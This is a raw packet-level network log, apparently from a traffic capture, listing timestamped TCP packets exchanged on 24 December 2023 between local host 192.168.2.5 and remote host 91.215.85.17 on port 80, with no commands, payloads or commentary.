Dec 24, 2023 10:44:27.065510988 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065541983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065570116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065613985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065618992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065658092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065669060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065713882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065733910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065776110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065797091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065839052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065848112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065888882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065896034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065920115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065937042 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065957069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065988064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066004038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066026926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.066040039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.066092968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066243887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066287041 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.066298962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066359043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066407919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.066524982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066564083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066569090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.066601992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066644907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066648006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.066705942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066751003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.066760063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066795111 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.066809893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066869974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.066914082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.066934109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067008018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067044020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067055941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067086935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067095041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067193031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067238092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067291021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067363977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067375898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067404032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067415953 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067434072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067467928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067476988 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067507982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067533016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067574978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067588091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067625046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067634106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067647934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067677975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067692041 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067745924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067790031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067830086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067838907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067887068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067926884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.067964077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.067977905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068000078 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068026066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068043947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068089962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068104982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068128109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068151951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068164110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068202019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068216085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068247080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068348885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068461895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068506002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068509102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068550110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068555117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068651915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068690062 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068706989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068741083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068783998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068818092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068861961 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068882942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068928003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.068969965 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.068984032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069009066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069050074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069051981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069231987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069276094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069317102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069334984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069363117 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069381952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069405079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069463015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069500923 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069524050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069536924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069576025 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069622040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069636106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069663048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069683075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069732904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069772005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069775105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069811106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069813967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069850922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069869995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069902897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.069910049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069945097 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.069969893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070017099 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070053101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070092916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070094109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070132017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070153952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070194006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070198059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070221901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070240974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070259094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070311069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070341110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070379019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070416927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070471048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070513964 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070544004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070558071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070581913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070605993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070647001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070664883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070688009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070702076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070740938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070807934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070842981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.070863962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070919991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.070960999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071013927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071033955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071058989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071074963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071085930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071115017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071136951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071216106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071249962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071258068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071295023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071331024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071445942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071482897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071499109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071525097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071573019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071594954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071652889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071695089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071722031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071769953 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071779013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071831942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071882010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.071902037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071944952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.071957111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072017908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.072052956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072279930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072324038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.072329998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072374105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072412968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.072452068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072490931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.072508097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072556973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072594881 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.072612047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072671890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072715044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.072757959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072804928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.072834969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072848082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072890997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.072895050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072942019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.072977066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073000908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073049068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073091030 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073112965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073154926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073164940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073205948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073245049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073268890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073313951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073355913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073391914 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073436022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073441982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073450089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073501110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073518991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073570967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073610067 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073622942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073666096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073667049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073724031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073774099 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073776007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073800087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073803902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073821068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073826075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073848963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073865891 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073890924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.073932886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.073995113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.074029922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.074033976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.074059010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.074104071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.074115038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.074162006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.074208975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.074902058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.074920893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.074965954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075021029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075058937 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075094938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075125933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075171947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075206995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075223923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075277090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075285912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075315952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075376987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075438023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075467110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075484037 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075509071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075534105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075577974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075613022 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075666904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075700045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075745106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075769901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075783968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075809002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075839996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075840950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075886011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075892925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075916052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.075932026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075949907 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.075978041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076040983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076085091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.076097965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076142073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076179981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.076190948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076236010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.076239109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076287985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076334000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076337099 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.076378107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076392889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076431036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.076443911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.076467991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076642036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076685905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.076704025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076901913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.076947927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.076973915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.077003956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.077049971 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.077105999 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.077146053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.287930012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.287945986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288002968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288031101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.288064003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.288125038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288140059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288198948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.288235903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288275957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288319111 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.288374901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288419008 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.288454056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288475037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288547039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.288556099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288608074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288660049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.288692951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288739920 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.288744926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288769960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.288819075 CET	49716	80	192.168.2.5	91.215.85.17
